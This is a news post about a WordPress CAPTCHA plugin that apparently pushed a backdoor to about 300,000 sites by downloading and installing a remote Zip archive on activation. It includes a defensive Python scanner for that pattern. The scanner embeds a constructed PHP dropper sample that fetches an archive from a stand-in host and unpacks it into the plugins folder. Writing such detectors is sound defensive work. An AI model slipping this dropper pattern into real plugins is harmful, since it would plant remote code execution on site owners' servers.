WordPress Plugin Installed Backdoor on 300K Websites

Plugins are a very useful addition that webmasters use to add new features and functionality to a website. But as they add features, they may also open new vulnerabilities in the site. This is what we usually see with the daily plugin updates and releases that come to fix critical security issues.

WordPress provides an automated notification when a new plugin update is available, and the update is usually applied manually by the webmaster. CAPTCHA solutions for WordPress, one of the most popular captcha plugins provided on the official repository, has been used to distribute a backdoor. The plugin was recently removed from the repository, but the damage looks to be big, with about 300,000 users having installed the malicious plugin.

The infection does not come directly from the WordPress repository. Instead, when a user installs or activates the plugin, the plugin connects to the simplywordpress website, downloads a Zip file, and extracts and installs it; that archive is what contains the backdoor. Major repositories generally run a scan engine against each project and its code to identify any malicious piece of code, or even vulnerable software.
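The delivery pattern above (an activation hook that fetches a remote archive and unpacks it into the site) can be flagged with a simple source-level heuristic. The script below is an added example, not code from Wordfence or from the plugin author; the two PHP samples and the `updates.example` URL are constructed, and the WordPress API names it looks for (`register_activation_hook`, `download_url`, `unzip_file`, `wp_remote_get`) are real functions.

```python
"""Heuristic scan for WordPress plugins that download and unpack remote code on
activation. Constructed example: the rules flag the combination of indicators,
none of which is suspicious on its own, for manual review."""
import re
from pathlib import Path

INDICATORS = {
    "activation_hook": re.compile(r"\bregister_activation_hook\s*\("),
    "remote_fetch": re.compile(r"\b(?:download_url|wp_remote_get|file_get_contents|curl_exec)\s*\("),
    "archive_extract": re.compile(r"\b(?:unzip_file|ZipArchive|extractTo|PharData)\b"),
}
URL_RX = re.compile(r"https?://[A-Za-z0-9.-]+(?:/[^\s\"']*)?")

def scan_source(php: str) -> dict:
    """Return which indicators appear in one PHP source and the URLs it references."""
    found = {name: bool(rx.search(php)) for name, rx in INDICATORS.items()}
    found["urls"] = sorted(set(URL_RX.findall(php)))
    # Fetch + extract triggered from the activation hook is the dropper shape
    # described in the post; report only when all three are present.
    found["suspicious"] = all(found[k] for k in INDICATORS)
    return found

def scan_plugin_dir(root: str) -> dict:
    """Scan every .php file under a plugins directory; map path -> findings for hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        result = scan_source(path.read_text(errors="ignore"))
        if result["suspicious"]:
            hits[str(path)] = result
    return hits

# Constructed samples: a harmless activation hook, and a dropper-style one.
BENIGN = """<?php
register_activation_hook(__FILE__, 'my_plugin_activate');
function my_plugin_activate() { add_option('my_plugin_version', '1.0'); }
"""
DROPPER = """<?php
register_activation_hook(__FILE__, 'cptch_activate');
function cptch_activate() {
    $tmp = download_url('https://updates.example/captcha.zip');  // constructed URL
    unzip_file($tmp, WP_PLUGIN_DIR . '/captcha/');
}
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("dropper", DROPPER)):
        print(label, scan_source(src))
```

Running `scan_plugin_dir("/path/to/wp-content/plugins")` on a real install lists only the plugins that combine all three indicators, so the output is short enough to review by hand.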

After discovering the backdoor, Wordfence started working with WordPress to remove the updated version that installs the malware, and the plugin author's account has been blocked so he will not be able to push other updates or new versions of that plugin.

100,000 sites have rolled back the installation of the plugin version that included the malware. The author still provides several other plugins containing the backdoor that are not hosted on the WordPress repository; those plugins are hard to control, and it is better to avoid any plugin not certified by WordPress.org.
